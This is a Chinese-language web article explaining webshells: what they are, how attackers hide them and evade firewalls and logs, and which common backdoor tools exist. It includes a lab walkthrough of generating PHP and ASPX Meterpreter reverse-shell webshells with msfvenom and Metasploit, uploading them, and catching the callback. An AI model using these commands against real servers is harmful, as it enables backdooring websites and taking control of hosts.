您当前位置: 首页 > 站长资讯 > webshell攻击是什么(webshell是什么意思)

webshell攻击是什么(webshell是什么意思)

编辑:mjj来源:网友投稿更新时间: 22-03-31 09:45:14

通常站长在搭建网站时,需要服务器开放web服务。

web指的是网页,shell则是为了获取某种程度上的服务器操作权限,是一种用脚本语言编写的脚本程序,两者结合在一起就是指web的一个管理工具,可以对web服务器进行操作的权限,也被称为webadmin。

Webshell一般被网站管理员用于服务器和网站的日常管理中,因为webshell的功能不仅仅拘泥于此,还能够根据FSO权限的不同查看数据库、上传下载文件包以及执行服务器上系统的任意相关命令(例如修改删除文件、创建用户等)。

网盾高防IDC:什么是Webshell?

这就非常容易被入侵者利用,从而达到控制网站服务器的目的。通常,入侵者会制作网页脚本,这些网页脚本被称之为web脚本木马。目前,比较常见的是PHP和ASP木马,也有基于.NET的脚本木马。

简单来说,Webshell被黑客利用的时候,相当于一种黑客植入的木马,可以帮助黑客对网站代码进行修改、上传、下载等,Webshell一般用cer、aspx、asp、php、jsp、asa、war等语言的脚本执行文件命名,也称为网站后门,黑客入侵网站后会把Websheel木马后门文件上传到网站的根目录下以及服务器上,或者通过在本地相关工具中插入代码,通过访问特定的网址访问网站木马,从而控制网站、篡改数据。

有些恶意网页脚本可以嵌套在正常网页中运行,且不容易被查杀。

在上传Webshell的时候必须要进行Webshell的隐藏工作,其目的一是为了不被其他黑客发现这个文件并加以利用,另一方面为了不让网站管理员发现并立即将其删掉:

Webshell可以渗透服务器防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用Webshell一般不会在系统日志中留下记录,只会在网站的Web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的,这也是为什么企业以及相关网站管理者会闻之色变的原因。

Web后门能够给攻击者提供很多功能,例如执行命令、浏览文件、辅助提权、执行SQL语句、反弹shell等。windoes系统下比较出名的莫过于"中国菜刀"还有很多代替"中国菜刀"的跨平台开源工具,例如"中国蚁剑"和cknife,均支持Mac,Windows和Linux。在kali下用的比较多的就是Weevely,Weevely支持的功能很强大,使用http头进行指令传输,唯一的缺点就是只支持PHP,其实metasploit框架中也自带了web后门,配合Meterpreter使用时,功能更强大。

Meterpreter后门

在metasploit中,有一个名为PHP Meterpreter的payload,利用这个可以创建具有Meterpreter功能的PHP webshell步骤如下所示:

1.使用msfvenom创建一个webshell.php

2.上传webshell.php到目标服务器

3.运行metasploit mulit-handler开始监听

4.访问webshell.php页面

5.获得反弹的metasploit shell

制作PHP Meterpreter

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.20 -f raw >111.php

-p:设置payload

-f:设置输出文件格式

网盾高防IDC:什么是Webshell?

在win7上搭建了phpstudy,将文件复制到phpstudy的www目录下,启动msfconsole进行监听,配置以下命令:

网盾高防IDC:什么是Webshell?

访问该网站,回到MSF下可以看到服务端已经反弹成功,最后使用sysinfo和getuid等命令渗透目标主机。

Aspx Meterpreter后门

在攻击中使用Aspx Meterpreter后门的步骤与PHP Meterpreter的大概相同。

调用模块msf5>use windows/shell reverse tcp,查看需要设置的参数,设置好端口和攻击目标主机IP后输入generate -h查看帮助命令。

网盾高防IDC:什么是Webshell?

生成个版本的shellcode命令:

generate -f asp生成asp版的shellcode

generate -f aspx生成aspx版的shellcode

在这里使用aspx版的shellcode,将内容保存为222.aspx,上传到phpstudy的www目录下,设置监听,最后访问该网站,回到MSF下可以看到服务端已经反弹成功,最后使用sysinfo和getuid等命令渗透目标主机。

D相关下载
Z最新攻略更多+
热门文章更多+
近期大作更多+
热门合集 更多+